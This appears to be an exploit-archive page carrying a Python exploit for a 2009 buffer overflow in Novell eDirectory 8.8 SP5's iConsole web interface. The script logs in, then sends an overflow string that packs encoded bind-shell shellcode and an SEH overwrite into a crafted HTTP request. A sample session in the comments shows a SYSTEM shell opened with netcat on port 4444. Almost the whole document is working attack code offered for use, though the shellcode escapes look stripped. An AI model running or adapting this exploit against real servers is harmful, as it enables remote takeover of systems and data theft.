Novell eDirectory 8.8 SP5 iConsole Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Novell eDirectory 8.8 SP5 iConsole Buffer Overflow
# Published : 2009-11-16
# Author : Matteo Memelli
# Previous Title : Eureka Mail Client Remote Buffer Overflow Exploit
# Next Title : Samba 3.0.10 - 3.3.5 Format String And Security Bypass Vulnerabilities
#!/usr/bin/python
# Novell eDirectory 8.8 SP5 iConsole BOF
# Vulnerability found by Hellcode Labs, 
# Original POC http://downloads.securityfocus.com/vulnerabilities/exploits/36815.pl
# 
# Exploit coded by Matteo Memelli | ryujin __A-T__ offensive-security.com
# www.offensive-security.com
# Spaghetti & Pwnsauce - 04/11/2009 
#
# Process dhost.exe becomes unstable after pwnage, so we need to connect quickly to save our shell ;)
#
# root@bt:~# ./gotohell.py 172.16.30.201;nc -v 172.16.30.201 4444
# 302 Found
# DHAC1=c8280012; Path=/
# 172.16.30.201: inverse host lookup failed: Unknown server error : Connection timed out
# (UNKNOWN) [172.16.30.201] 4444 (?) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
# 
# C:NovellNDSDIBFiles>whoami
# whoami
# nt authoritysystem
# 
# C:NovellNDSDIBFiles>
 

import sys
import httplib, urllib

try:
   HOST = sys.argv[1]
except IndexError:
   print "Usage: %s HOST" % sys.argv[0]

def do_auth(usr, pwd):
   params = urllib.urlencode({'usr': usr, 'pwd': pwd, 'button': 'Login'})
   headers = {"Content-type": "application/x-www-form-urlencoded",
              "Accept": "text/plain"}
   conn = httplib.HTTPSConnection("%s:8030" % HOST)
   conn.request("POST", "/_LOGIN_SERVER_RSP_", params, headers)
   response = conn.getresponse()
   cookie=response.getheaders()[1][1]
   print response.status, response.reason
   data = response.read()
   conn.close()
   print cookie
   return cookie

def do_pwn(evil, cookie):
   headers = {"Host": "%s:8030" % HOST,
              "Cookie": "%s" % cookie}
   conn = httplib.HTTPSConnection("%s:8030" % HOST)
   conn.request("GET", "/dhost/modules?L:"+evil, None, headers)

# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
shellcode = (
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e"
"x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx48"
"x4ex36x46x52x46x42x4bx58x45x54x4ex43x4bx38x4ex37"
"x45x50x4ax47x41x30x4fx4ex4bx38x4fx54x4ax31x4bx58"
"x4fx55x42x52x41x50x4bx4ex49x54x4bx48x46x33x4bx58"
"x41x50x50x4ex41x33x42x4cx49x59x4ex4ax46x38x42x4c"
"x46x57x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
"x46x4fx4bx33x46x55x46x42x4ax32x45x47x45x4ex4bx58"
"x4fx55x46x42x41x30x4bx4ex48x36x4bx48x4ex50x4bx34"
"x4bx48x4fx45x4ex31x41x50x4bx4ex43x30x4ex52x4bx38"
"x49x58x4ex36x46x42x4ex41x41x36x43x4cx41x43x4bx4d"
"x46x56x4bx48x43x44x42x53x4bx58x42x44x4ex30x4bx48"
"x42x47x4ex41x4dx4ax4bx48x42x34x4ax30x50x35x4ax56"
"x50x48x50x54x50x50x4ex4ex42x35x4fx4fx48x4dx48x46"
"x43x55x48x56x4ax46x43x53x44x33x4ax36x47x37x43x57"
"x44x33x4fx35x46x55x4fx4fx42x4dx4ax36x4bx4cx4dx4e"
"x4ex4fx4bx53x42x55x4fx4fx48x4dx4fx55x49x58x45x4e"
"x48x46x41x58x4dx4ex4ax50x44x30x45x35x4cx46x44x50"
"x4fx4fx42x4dx4ax56x49x4dx49x30x45x4fx4dx4ax47x55"
"x4fx4fx48x4dx43x45x43x35x43x45x43x55x43x45x43x34"
"x43x45x43x44x43x35x4fx4fx42x4dx48x56x4ax36x41x31"
"x4ex35x48x46x43x45x49x48x41x4ex45x59x4ax46x46x4a"
"x4cx41x42x37x47x4cx47x55x4fx4fx48x4dx4cx36x42x41"
"x41x45x45x35x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x52"
"x49x4ex47x45x4fx4fx48x4dx43x55x45x35x4fx4fx42x4d"
"x4ax56x45x4ex49x44x48x38x49x54x47x55x4fx4fx48x4d"
"x42x55x46x45x46x45x45x45x4fx4fx42x4dx43x49x4ax46"
"x47x4ex49x57x48x4cx49x57x47x55x4fx4fx48x4dx45x55"
"x4fx4fx42x4dx48x56x4cx46x46x36x48x36x4ax56x43x36"
"x4dx46x49x58x45x4ex4cx56x42x45x49x45x49x32x4ex4c"
"x49x48x47x4ex4cx56x46x34x49x48x44x4ex41x33x42x4c"
"x43x4fx4cx4ax50x4fx44x54x4dx32x50x4fx44x54x4ex52"
"x43x39x4dx58x4cx57x4ax43x4bx4ax4bx4ax4bx4ax4ax46"
"x44x37x50x4fx43x4bx48x41x4fx4fx45x47x46x34x4fx4f"
"x48x4dx4bx35x47x45x44x35x41x35x41x35x41x45x4cx56"
"x41x30x41x35x41x35x45x55x41x45x4fx4fx42x4dx4ax56"
"x4dx4ax49x4dx45x50x50x4cx43x45x4fx4fx48x4dx4cx46"
"x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx48x47x55x4ex4f"
"x43x58x46x4cx46x46x4fx4fx48x4dx44x45x4fx4fx42x4d"
"x4ax56x4fx4ex50x4cx42x4ex42x56x43x45x4fx4fx48x4d"
"x4fx4fx42x4dx5a")

## PUT YOUR CREDENTIALS HERE ##
usr = ".Admin.O=offsec.OFFSEC."
pwd = "admin"
###############################
j1  = "xEBx06x90x90"
j2  = "xE9x26xFDxFFxFF"
n1  = "x90"*8
n2  = "x90"*4
p1  = "x41"*947
p2  = "x42"*221
ret = "x6Ax38x81x64" # 0x6481386A nmasldap.dll SafeSEH unprotected
evil = p1 + n1 + shellcode + j1 + ret + n2 + j2 + p2
# sweet biscuit...
cookie = do_auth(usr, pwd)
# sh...
do_pwn(evil, cookie)